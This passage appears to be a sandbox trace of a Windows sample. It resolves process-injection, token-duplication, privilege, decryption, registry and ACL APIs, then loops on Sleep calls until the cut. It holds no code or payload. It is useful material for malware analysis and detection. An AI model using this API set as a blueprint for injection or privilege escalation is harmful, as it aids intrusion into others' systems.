(hModule=0x77b20000, lpProcName="FindNextFileW") returned 0x77b31910 [0241.447] GetProcAddress (hModule=0x77b20000, lpProcName="GetFileTime") returned 0x77b24f80 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="LoadLibraryA") returned 0x77b37070 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcmpA") returned 0x77b81230 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="SetFileAttributesW") returned 0x77b337a0 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="CreateDirectoryW") returned 0x77b2ad70 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="WaitForSingleObject") returned 0x77b42b20 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="SignalObjectAndWait") returned 0x77b92c90 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="SetEvent") returned 0x77b33f00 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="CreateRemoteThread") returned 0x77b6c4f0 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="OpenProcess") returned 0x77b3cad0 [0241.448] GetProcAddress (hModule=0x77b20000, lpProcName="VirtualFreeEx") returned 0x77b6bb90 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="ReadProcessMemory") returned 0x77b6bdc0 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="TerminateProcess") returned 0x77b6bca0 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="VirtualProtectEx") returned 0x77b6bb70 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="VirtualAllocEx") returned 0x77b6bbd0 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="ResetEvent") returned 0x77b2d9a0 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="GetExitCodeThread") returned 0x77b31130 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="CreateEventW") returned 0x77b35290 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="DuplicateHandle") returned 0x77b35d10 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="WriteProcessMemory") returned 0x77b6bad0 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="ResumeThread") returned 0x77b313a0 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="CreateMutexW") returned 0x77b313c0 [0241.449] GetProcAddress (hModule=0x77b20000, lpProcName="LocalFree") returned 0x77b347a0 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcpyW") returned 0x77b6e0d0 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="DeleteFileW") returned 0x77b2ad90 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="SetCurrentDirectoryW") returned 0x77b3cab0 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="EnterCriticalSection") returned 0x77c92fc0 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="MoveFileW") returned 0x77baf7f0 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="GetTempPathW") returned 0x77b82040 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="GetStartupInfoW") returned 0x77b38070 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="GetModuleFileNameW") returned 0x77b37700 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="GetFileAttributesW") returned 0x77b3bdd0 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="LeaveCriticalSection") returned 0x77c93000 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="Sleep") returned 0x77b42b70 [0241.450] GetProcAddress (hModule=0x77b20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x77b364e0 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="GetTickCount") returned 0x77b42b00 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="MoveFileExW") returned 0x77b23060 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="CreateProcessW") returned 0x77b41bb0 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="GetTempFileNameW") returned 0x77b6c030 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcmpiW") returned 0x77b31930 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="CreateFileW") returned 0x77b31870 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="ReadFile") returned 0x77b31500 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="WriteFile") returned 0x77b435a0 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="SetFilePointer") returned 0x77b31150 [0241.451] GetProcAddress (hModule=0x77b20000, lpProcName="GetVersion") returned 0x77b301d0 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="CloseHandle") returned 0x77b42f80 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="GetVersionExW") returned 0x77b2d910 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="GetCurrentProcess") returned 0x77b35cf0 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="GetSystemTimeAsFileTime") returned 0x77b33f40 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="GetCurrentProcessId") returned 0x77b35a50 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="lstrlenA") returned 0x77b3caf0 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="UnhandledExceptionFilter") returned 0x77bb9330 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="SetUnhandledExceptionFilter") returned 0x77b39b70 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="GetCurrentThreadId") returned 0x77b33ee0 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="QueryPerformanceCounter") returned 0x77b36500 [0241.452] GetProcAddress (hModule=0x77b20000, lpProcName="GetModuleHandleA") returned 0x77b365e0 [0241.453] GetProcAddress (hModule=0x77b20000, lpProcName="WideCharToMultiByte") returned 0x77b435f0 [0241.453] GetProcAddress (hModule=0x77b20000, lpProcName="MultiByteToWideChar") returned 0x77b35b50 [0241.453] GetProcAddress (hModule=0x77b20000, lpProcName="Process32FirstW") returned 0x77b21e00 [0241.453] GetProcAddress (hModule=0x77b20000, lpProcName="Process32NextW") returned 0x77b220f0 [0241.453] GetProcAddress (hModule=0x77b20000, lpProcName="CreateToolhelp32Snapshot") returned 0x77b221e0 [0241.453] LoadLibraryW (lpLibFileName="ADVAPI32.dll") returned 0x7feff0e0000 [0241.453] GetProcAddress (hModule=0x7feff0e0000, lpProcName="GetUserNameW") returned 0x7feff0f1fd0 [0241.453] GetProcAddress (hModule=0x7feff0e0000, lpProcName="GetTokenInformation") returned 0x7feff0fbd50 [0241.453] GetProcAddress (hModule=0x7feff0e0000, lpProcName="LookupAccountSidW") returned 0x7feff0fb898 [0241.453] GetProcAddress (hModule=0x7feff0e0000, lpProcName="DuplicateTokenEx") returned 0x7feff0ed310 [0241.453] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CreateProcessAsUserW") returned 0x7feff0eafe8 [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="EqualSid") returned 0x7feff0fb820 [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="OpenProcessToken") returned 0x7feff0fbd70 [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="FreeSid") returned 0x7feff0fb818 [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="AllocateAndInitializeSid") returned 0x7feff0fb63c [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptDestroyKey") returned 0x7feff0eafa0 [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptHashData") returned 0x7feff0edac0 [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptDestroyHash") returned 0x7feff0edb00 [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptDecrypt") returned 0x7feff11b6d0 [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptCreateHash") returned 0x7feff0edad4 [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptImportKey") returned 0x7feff0eaf6c [0241.454] GetProcAddress (hModule=0x7feff0e0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x7feff0f2040 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptReleaseContext") returned 0x7feff0edd10 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptSetKeyParam") returned 0x7feff11b508 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptAcquireContextW") returned 0x7feff0ed98c [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptGetHashParam") returned 0x7feff0edb20 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="LookupPrivilegeValueW") returned 0x7feff0fb9e0 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="AdjustTokenPrivileges") returned 0x7feff0fb9b0 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RevertToSelf") returned 0x7feff0edd00 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RegCreateKeyExW") returned 0x7feff0fb520 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RegCloseKey") returned 0x7feff100710 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RegOpenKeyExW") returned 0x7feff1006f0 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RegSetValueExW") returned 0x7feff0f1ed0 [0241.455] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SetNamedSecurityInfoW") returned 0x7feff0e89a0 [0241.456] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SetSecurityInfo") returned 0x7feff0e8420 [0241.456] GetProcAddress (hModule=0x7feff0e0000, lpProcName="GetSecurityInfo") returned 0x7feff0ea8e0 [0241.456] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SetEntriesInAclW") returned 0x7feff0f3540 [0241.456] GetProcAddress (hModule=0x7feff0e0000, lpProcName="GetLengthSid") returned 0x7feff0fb580 [0241.456] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CopySid") returned 0x7feff0fbda0 [0241.456] GetProcAddress (hModule=0x7feff0e0000, lpProcName="InitializeSecurityDescriptor") returned 0x7feff0fb504 [0241.456] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SetSecurityDescriptorDacl") returned 0x7feff0fb5a0 [0241.456] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7feffa40000 [0241.456] GetProcAddress (hModule=0x7feffa40000, lpProcName="CoCreateInstance") returned 0x7feffa67490 [0241.456] GetProcAddress (hModule=0x7feffa40000, lpProcName="CoUninitialize") returned 0x7feffa61314 [0241.456] LoadLibraryW (lpLibFileName="CRYPT32.dll") returned 0x7fefddf0000 [0241.457] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CryptStringToBinaryW") returned 0x7fefde3e9a0 [0241.457] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CryptBinaryToStringW") returned 0x7fefde24198 [0241.457] LoadLibraryW (lpLibFileName="SHLWAPI.dll") returned 0x7feff640000 [0241.457] GetProcAddress (hModule=0x7feff640000, lpProcName="PathFindFileNameW") returned 0x7feff653920 [0241.457] GetProcAddress (hModule=0x7feff640000, lpProcName="PathAddBackslashW") returned 0x7feff653f70 [0241.457] GetProcAddress (hModule=0x7feff640000, lpProcName="PathRenameExtensionW") returned 0x7feff66e6c0 [0241.457] GetProcAddress (hModule=0x7feff640000, lpProcName="StrStrIW") returned 0x7feff64fb70 [0241.457] GetProcAddress (hModule=0x7feff640000, lpProcName="PathRemoveBackslashW") returned 0x7feff64d014 [0241.457] GetProcAddress (hModule=0x7feff640000, lpProcName="PathRemoveFileSpecW") returned 0x7feff64a43c [0241.458] GetProcAddress (hModule=0x7feff640000, lpProcName="PathFindExtensionW") returned 0x7feff652b00 [0241.458] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77c40000 [0241.458] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryInformationProcess") returned 0x77c914a0 [0241.458] LoadLibraryW (lpLibFileName="IPHLPAPI.dll") returned 0x7fefb680000 [0241.460] GetProcAddress (hModule=0x7fefb680000, lpProcName="GetAdaptersInfo") returned 0x7fefb68792c [0241.460] LoadLibraryW (lpLibFileName="USERENV.dll") returned 0x7fefcf30000 [0241.462] GetProcAddress (hModule=0x7fefcf30000, lpProcName="CreateEnvironmentBlock") returned 0x7fefcf310b0 [0241.462] GetProcAddress (hModule=0x7fefcf30000, lpProcName="DestroyEnvironmentBlock") returned 0x7fefcf31080 [0241.462] GetProcAddress (hModule=0x7fefcf30000, lpProcName="LoadUserProfileW") returned 0x7fefcf31170 [0241.462] GetProcAddress (hModule=0x7fefcf30000, lpProcName="UnloadUserProfile") returned 0x7fefcf33670 [0241.462] Sleep (dwMilliseconds=0x1) [0241.467] GetLastError () returned 0x0 [0241.467] Sleep (dwMilliseconds=0x1) [0241.483] GetLastError () returned 0x0 [0241.483] Sleep (dwMilliseconds=0x1) [0241.500] GetLastError () returned 0x0 [0241.500] Sleep (dwMilliseconds=0x1) [0241.514] GetLastError () returned 0x0 [0241.514] Sleep (dwMilliseconds=0x1) [0241.529] GetLastError () returned 0x0 [0241.529] Sleep (dwMilliseconds=0x1) [0241.548] GetLastError () returned 0x0 [0241.548] Sleep (dwMilliseconds=0x1) [0241.560] GetLastError () returned 0x0 [0241.560] Sleep (dwMilliseconds=0x1) [0241.576] GetLastError () returned 0x0 [0241.576] Sleep (dwMilliseconds=0x1) [0241.592] GetLastError () returned 0x0 [0241.592] Sleep (dwMilliseconds=0x1) [0241.607] GetLastError () returned 0x0 [0241.607] Sleep (dwMilliseconds=0x1) [0241.623] GetLastError () returned 0x0 [0241.623] Sleep (dwMilliseconds=0x1) [0241.638] GetLastError () returned 0x0 [0241.638] Sleep (dwMilliseconds=0x1) [0241.660] GetLastError () returned 0x0 [0241.660] Sleep (dwMilliseconds=0x1) [0241.671] GetLastError () returned 0x0 [0241.671] Sleep (dwMilliseconds=0x1) [0241.685] GetLastError () returned 0x0 [0241.685] Sleep (dwMilliseconds=0x1) [0241.701] GetLastError () returned 0x0 [0241.701] Sleep (dwMilliseconds=0x1) [0241.716] GetLastError () returned 0x0 [0241.716] Sleep (dwMilliseconds=0x1) [0241.732] GetLastError () returned 0x0 [0241.732] Sleep (dwMilliseconds=0x1) [0241.748] GetLastError () returned 0x0 [0241.748] Sleep (dwMilliseconds=0x1) [0241.763] GetLastError () returned 0x0 [0241.763] Sleep (dwMilliseconds=0x1) [0241.779] GetLastError () returned 0x0 [0241.779] Sleep (dwMilliseconds=0x1) [0241.794] GetLastError () returned 0x0 [0241.795] Sleep (dwMilliseconds=0x1) [0241.811] GetLastError () returned 0x0 [0241.811] Sleep (dwMilliseconds=0x1) [0241.826] GetLastError () returned 0x0 [0241.826] Sleep (dwMilliseconds=0x1) [0241.841] GetLastError () returned 0x0 [0241.841] Sleep (dwMilliseconds=0x1) [0241.857] GetLastError () returned 0x0 [0241.857] Sleep (dwMilliseconds=0x1) [0241.872] GetLastError () returned 0x0 [0241.873] Sleep (dwMilliseconds=0x1) [0241.888] GetLastError () returned 0x0 [0241.888] Sleep (dwMilliseconds=0x1) [0241.904] GetLastError () returned 0x0 [0241.904] Sleep (dwMilliseconds=0x1) [0241.920] GetLastError () returned 0x0 [0241.920] Sleep (dwMilliseconds=0x1) [0241.935] GetLastError () returned 0x0 [0241.935] Sleep (dwMilliseconds=0x1) [0241.950] GetLastError () returned 0x0 [0241.950] Sleep (dwMilliseconds=0x1) [0241.966] GetLastError () returned 0x0 [0241.966] Sleep (dwMilliseconds=0x1) [0241.997] GetLastError () returned 0x0 [0241.997] Sleep (dwMilliseconds=0x1) [0242.013] GetLastError () returned 0x0 [0242.013] Sleep (dwMilliseconds=0x1) [0242.029] GetLastError () returned 0x0 [0242.029] Sleep (dwMilliseconds=0x1) [0242.044] GetLastError () returned 0x0 [0242.044] Sleep (dwMilliseconds=0x1) [0242.060] GetLastError () returned 0x0 [0242.060] Sleep (dwMilliseconds=0x1) [0242.075] GetLastError () returned 0x0 [0242.075] Sleep (dwMilliseconds=0x1) [0242.091] GetLastError () returned 0x0 [0242.091] Sleep (dwMilliseconds=0x1) [0242.106] GetLastError () returned 0x0 [0242.106] Sleep (dwMilliseconds=0x1) [0242.122] GetLastError () returned 0x0 [0242.122] Sleep (dwMilliseconds=0x1) [0242.138] GetLastError () returned 0x0 [0242.138] Sleep (dwMilliseconds=0x1) [0242.177] GetLastError () returned 0x0 [0242.177] Sleep (dwMilliseconds=0x1) [0242.185] GetLastError () returned 0x0 [0242.185] Sleep (dwMilliseconds=0x1) [0242.200] GetLastError () returned 0x0 [0242.200] Sleep (dwMilliseconds=0x1) [0242.216] GetLastError () returned 0x0 [0242.216] Sleep (dwMilliseconds=0x1) [0242.231] GetLastError () returned 0x0 [0242.231] Sleep (dwMilliseconds=0x1) [0242.247] GetLastError () returned 0x0 [0242.247] Sleep (dwMilliseconds=0x1) [0242.262] GetLastError () returned 0x0 [0242.263] Sleep (dwMilliseconds=0x1) [0242.278] GetLastError () returned 0x0 [0242.278] Sleep (dwMilliseconds=0x1) [0242.294] GetLastError () returned 0x0 [0242.294] Sleep (dwMilliseconds=0x1) [0242.309] GetLastError () returned 0x0 [0242.309] Sleep (dwMilliseconds=0x1) [0242.325] GetLastError () returned 0x0 [0242.325] Sleep (dwMilliseconds=0x1) [0242.341] GetLastError () returned 0x0 [0242.341] Sleep (dwMilliseconds=0x1) [0242.356] GetLastError () returned 0x0 [0242.356] Sleep (dwMilliseconds=0x1) [0242.372] GetLastError () returned 0x0 [0242.372] Sleep (dwMilliseconds=0x1) [0242.387] GetLastError () returned 0x0 [0242.387] Sleep (dwMilliseconds=0x1) [0242.403] GetLastError () returned 0x0 [0242.403] Sleep (dwMilliseconds=0x1) [0242.419] GetLastError () returned 0x0 [0242.419] Sleep (dwMilliseconds=0x1) [0242.434] GetLastError () returned 0x0 [0242.434] Sleep (dwMilliseconds=0x1) [0242.450] GetLastError () returned 0x0 [0242.450] Sleep (dwMilliseconds=0x1) [0242.466] GetLastError () returned 0x0 [0242.466] Sleep (dwMilliseconds=0x1) [0242.481] GetLastError () returned 0x0 [0242.481] Sleep (dwMilliseconds=0x1) [0242.497] GetLastError () returned 0x0 [0242.497] Sleep (dwMilliseconds=0x1) [0242.512] GetLastError () returned 0x0 [0242.512] Sleep (dwMilliseconds=0x1) [0242.528] GetLastError () returned 0x0 [0242.528] Sleep (dwMilliseconds=0x1) [0242.544] GetLastError () returned 0x0 [0242.544] Sleep (dwMilliseconds=0x1) [0242.559] GetLastError () returned 0x0 [0242.559] Sleep (dwMilliseconds=0x1) [0242.575] GetLastError () returned 0x0 [0242.575] Sleep (dwMilliseconds=0x1) [0242.590] GetLastError () returned 0x0 [0242.590] Sleep (dwMilliseconds=0x1) [0242.606] GetLastError () returned 0x0 [0242.606] Sleep (dwMilliseconds=0x1) [0242.621] GetLastError () returned 0x0 [0242.621] Sleep (dwMilliseconds=0x1) [0242.637] GetLastError () returned 0x0 [0242.637] Sleep (dwMilliseconds=0x1) [0242.652] GetLastError () returned 0x0 [0242.652] Sleep (dwMilliseconds=0x1) [0242.676] GetLastError () returned 0x0 [0242.676] Sleep (dwMilliseconds=0x1) [0242.684] GetLastError () returned 0x0 [0242.684] Sleep (dwMilliseconds=0x1) [0242.699] GetLastError () returned 0x0 [0242.699] Sleep (dwMilliseconds=0x1) [0242.715] GetLastError () returned 0x0 [0242.715] Sleep (dwMilliseconds=0x1) [0242.731] GetLastError () returned 0x0 [0242.731] Sleep (dwMilliseconds=0x1) [0242.746] GetLastError () returned 0x0 [0242.746] Sleep (dwMilliseconds=0x1) [0242.762] GetLastError () returned 0x0 [0242.762] Sleep (dwMilliseconds=0x1) [0242.777] GetLastError () returned 0x0 [0242.777] Sleep (dwMilliseconds=0x1) [0242.793] GetLastError () returned 0x0 [0242.793] Sleep (dwMilliseconds=0x1) [0242.809] GetLastError () returned 0x0 [0242.809] Sleep (dwMilliseconds=0x1) [0242.824] GetLastError () returned 0x0 [0242.824] Sleep (dwMilliseconds=0x1) [0242.840] GetLastError () returned 0x0 [0242.840] Sleep (dwMilliseconds=0x1) [0242.855] GetLastError () returned 0x0 [0242.855] Sleep (dwMilliseconds=0x1) [0242.871] GetLastError () returned 0x0 [0242.871] Sleep (dwMilliseconds=0x1) [0242.887] GetLastError () returned 0x0 [0242.888] Sleep (dwMilliseconds=0x1) [0242.902] GetLastError () returned 0x0 [0242.902] Sleep (dwMilliseconds=0x1) [0242.918] GetLastError () returned 0x0 [0242.918] Sleep (dwMilliseconds=0x1) [0242.934] GetLastError () returned 0x0 [0242.934] Sleep (dwMilliseconds=0x1) [0242.949] GetLastError () returned 0x0 [0242.949] Sleep (dwMilliseconds=0x1) [0242.964] GetLastError () returned 0x0 [0242.965] Sleep (dwMilliseconds=0x1) [0242.980] GetLastError () returned 0x0 [0242.980] Sleep (dwMilliseconds=0x1) [0242.996] GetLastError () returned 0x0 [0242.996] Sleep (dwMilliseconds=0x1) [0243.011] GetLastError () returned 0x0 [0243.011] Sleep (dwMilliseconds=0x1) [0243.027] GetLastError () returned 0x0 [0243.027] Sleep (dwMilliseconds=0x1) [0243.043] GetLastError () returned 0x0 [0243.043] Sleep (dwMilliseconds=0x1) [0243.058] GetLastError () returned 0x0 [0243.058] Sleep (dwMilliseconds=0x1) [0243.074] GetLastError () returned 0x0 [0243.074] Sleep (dwMilliseconds=0x1) [0243.089] GetLastError () returned 0x0 [0243.089] Sleep (dwMilliseconds=0x1) [0243.105] GetLastError () returned 0x0 [0243.105] Sleep (dwMilliseconds=0x1) [0243.121] GetLastError () returned 0x0 [0243.121] Sleep (dwMilliseconds=0x1) [0243.136] GetLastError () returned 0x0 [0243.136] Sleep (dwMilliseconds=0x1) [0243.170] GetLastError () returned 0x0 [0243.170] Sleep (dwMilliseconds=0x1) [0243.183] GetLastError () returned 0x0 [0243.183] Sleep (dwMilliseconds=0x1) [0243.199] GetLastError () returned 0x0 [0243.199] Sleep (dwMilliseconds=0x1) [0243.214] GetLastError () returned 0x0 [0243.214] Sleep (dwMilliseconds=0x1) [0243.230] GetLastError () returned 0x0 [0243.230] Sleep (dwMilliseconds=0x1) [0243.245] GetLastError () returned 0x0 [0243.245] Sleep (dwMilliseconds=0x1) [0243.261] GetLastError () returned 0x0 [0243.261] Sleep (dwMilliseconds=0x1) [0243.277] GetLastError () returned 0x0 [0243.277] Sleep (dwMilliseconds=0x1) [0243.292] GetLastError () returned 0x0 [0243.292] Sleep (dwMilliseconds=0x1) [0243.308] GetLastError () returned 0x0 [0243.308] Sleep (dwMilliseconds=0x1) [0243.324] GetLastError () returned 0x0 [0243.324] Sleep (dwMilliseconds=0x1) [0243.339] GetLastError () returned 0x0 [0243.339] Sleep (dwMilliseconds=0x1) [0243.355] GetLastError () returned 0x0 [0243.355] Sleep (dwMilliseconds=0x1) [0243.370] GetLastError () returned 0x0 [0243.370] Sleep (dwMilliseconds=0x1) [0243.386] GetLastError () returned 0x0 [0243.386] Sleep (dwMilliseconds=0x1) [0243.401] GetLastError () returned 0x0 [0243.401] Sleep (dwMilliseconds=0x1) [0243.417] GetLastError () returned 0x0 [0243.417] Sleep (dwMilliseconds=0x1) [0243.433] GetLastError () returned 0x0 [0243.433] Sleep (dwMilliseconds=0x1) [0243.448] GetLastError () returned 0x0 [0243.448] Sleep (dwMilliseconds=0x1) [0243.464] GetLastError () returned 0x0 [0243.464] Sleep (dwMilliseconds=0x1) [0243.479] GetLastError () returned 0x0 [0243.479] Sleep (dwMilliseconds=0x1) [0243.495] GetLastError () returned 0x0 [0243.495] Sleep (dwMilliseconds=0x1) [0243.511] GetLastError () returned 0x0 [0243.511] Sleep (dwMilliseconds=0x1) [0243.526] GetLastError () returned 0x0 [0243.526] Sleep (dwMilliseconds=0x1) [0243.548] GetLastError () returned 0x0 [0243.548] Sleep (dwMilliseconds=0x1) [0243.557] GetLastError () returned 0x0 [0243.558] Sleep (dwMilliseconds=0x1) [0243.573] GetLastError () returned 0x0 [0243.573] Sleep (dwMilliseconds=0x1) [0243.589] GetLastError () returned 0x0 [0243.589] Sleep (dwMilliseconds=0x1) [0243.604] GetLastError () returned 0x0 [0243.604] Sleep (dwMilliseconds=0x1) [0243.620] GetLastError () returned 0x0 [0243.620] Sleep (dwMilliseconds=0x1) [0243.635] GetLastError () returned 0x0 [0243.635] Sleep (dwMilliseconds=0x1) [0243.651] GetLastError () returned 0x0 [0243.651] Sleep (dwMilliseconds=0x1) [0243.667] GetLastError () returned 0x0 [0243.667] Sleep (dwMilliseconds=0x1) [0243.682] GetLastError () returned 0x0 [0243.682] Sleep (dwMilliseconds=0x1) [0243.698] GetLastError () returned 0x0 [0243.698] Sleep (dwMilliseconds=0x1) [0243.713] GetLastError () returned 0x0 [0243.713] Sleep (dwMilliseconds=0x1) [0243.729] GetLastError () returned 0x0 [0243.729] Sleep (dwMilliseconds=0x1) [0243.745] GetLastError () returned 0x0 [0243.745] Sleep (dwMilliseconds=0x1) [0243.760] GetLastError () returned 0x0 [0243.760] Sleep (dwMilliseconds=0x1) [0243.777] GetLastError () returned 0x0 [0243.777] Sleep (dwMilliseconds=0x1) [0243.804] GetLastError () returned 0x0 [0243.804] Sleep (dwMilliseconds=0x1) [0243.807] GetLastError () returned 0x0 [0243.807] Sleep (dwMilliseconds=0x1) [0243.823] GetLastError () returned 0x0 [0243.823] Sleep (dwMilliseconds=0x1) [0243.839] GetLastError () returned 0x0 [0243.839] Sleep (dwMilliseconds=0x1) [0243.854] GetLastError () returned 0x0 [0243.854] Sleep (dwMilliseconds=0x1) [0243.870] GetLastError () returned 0x0 [0243.870] Sleep (dwMilliseconds=0x1) [0243.885] GetLastError () returned 0x0 [0243.885] Sleep (dwMilliseconds=0x1) [0243.901] GetLastError () returned 0x0 [0243.901] Sleep (dwMilliseconds=0x1) [0243.916] GetLastError () returned 0x0 [0243.916] Sleep (dwMilliseconds=0x1) [0243.932] GetLastError () returned 0x0 [0243.932] Sleep (dwMilliseconds=0x1) [0243.948] GetLastError () returned 0x0 [0243.948] Sleep (dwMilliseconds=0x1) [0243.963] GetLastError () returned 0x0 [0243.963] Sleep (dwMilliseconds=0x1) [0243.979] GetLastError () returned 0x0 [0243.979] Sleep (dwMilliseconds=0x1) [0243.995] GetLastError () returned 0x0 [0243.995] Sleep (dwMilliseconds=0x1) [0244.010] GetLastError () returned 0x0 [0244.010] Sleep (dwMilliseconds=0x1) [0244.025] GetLastError () returned 0x0 [0244.025] Sleep (dwMilliseconds=0x1) [0244.041] GetLastError () returned 0x0 [0244.041] Sleep (dwMilliseconds=0x1) [0244.057] GetLastError () returned 0x0 [0244.057] Sleep (dwMilliseconds=0x1) [0244.072] GetLastError () returned 0x0 [0244.072] Sleep (dwMilliseconds=0x1) [0244.088] GetLastError () returned 0x0 [0244.088] Sleep (dwMilliseconds=0x1) [0244.104] GetLastError () returned 0x0 [0244.104] Sleep (dwMilliseconds=0x1) [0244.121] GetLastError () returned 0x0 [0244.121] Sleep (dwMilliseconds=0x1) [0244.139] GetLastError () returned 0x0 [0244.139] Sleep (dwMilliseconds=0x1) [0244.170] GetLastError () returned 0x0 [0244.170] Sleep (dwMilliseconds=0x1) [0244.181] GetLastError () returned 0x0 [0244.181] Sleep (dwMilliseconds=0x1) [0244.197] GetLastError () returned 0x0 [0244.197] Sleep (dwMilliseconds=0x1) [0244.213] GetLastError () returned 0x0 [0244.213] Sleep (dwMilliseconds=0x1) [0244.228] GetLastError () returned 0x0 [0244.228] Sleep (dwMilliseconds=0x1) [0244.244] GetLastError () returned 0x0 [0244.244] Sleep (dwMilliseconds=0x1) [0244.259] GetLastError () returned 0x0 [0244.259] Sleep (dwMilliseconds=0x1) [0244.275] GetLastError () returned 0x0 [0244.275] Sleep (dwMilliseconds=0x1) [0244.291] GetLastError () returned 0x0 [0244.291] Sleep (dwMilliseconds=0x1) [0244.306] GetLastError () returned 0x0 [0244.306] Sleep (dwMilliseconds=0x1) [0244.322] GetLastError () returned 0x0 [0244.322] Sleep (dwMilliseconds=0x1) [0244.337] GetLastError () returned 0x0 [0244.337] Sleep (dwMilliseconds=0x1) [0244.353] GetLastError () returned 0x0 [0244.353] Sleep (dwMilliseconds=0x1) [0244.369] GetLastError () returned 0x0 [0244.369] Sleep (dwMilliseconds=0x1) [0244.385] GetLastError () returned 0x0 [0244.385] Sleep (dwMilliseconds=0x1) [0244.400] GetLastError () returned 0x0 [0244.400] Sleep (dwMilliseconds=0x1) [0244.416] GetLastError () returned 0x0 [0244.416] Sleep (dwMilliseconds=0x1) [0244.431] GetLastError () returned 0x0 [0244.431] Sleep (dwMilliseconds=0x1) [0244.447] GetLastError () returned 0x0 [0244.447] Sleep (dwMilliseconds=0x1) [0244.462] GetLastError () returned 0x0 [0244.462] Sleep (dwMilliseconds=0x1) [0244.478] GetLastError () returned 0x0 [0244.478] Sleep (dwMilliseconds=0x1) [0244.493] GetLastError () returned 0x0 [0244.493] Sleep (dwMilliseconds=0x1) [0244.509] GetLastError () returned 0x0 [0244.509] Sleep (dwMilliseconds=0x1) [0244.525] GetLastError () returned 0x0 [0244.525] Sleep (dwMilliseconds=0x1) [0244.541] GetLastError () returned 0x0 [0244.541] Sleep (dwMilliseconds=0x1) [0244.556] GetLastError () returned 0x0 [0244.556] Sleep (dwMilliseconds=0x1) [0244.571] GetLastError () returned 0x0 [0244.571] Sleep (dwMilliseconds=0x1) [0244.587] GetLastError () returned 0x0 [0244.587] Sleep (dwMilliseconds=0x1) [0244.603] GetLastError () returned 0x0 [0244.603] Sleep 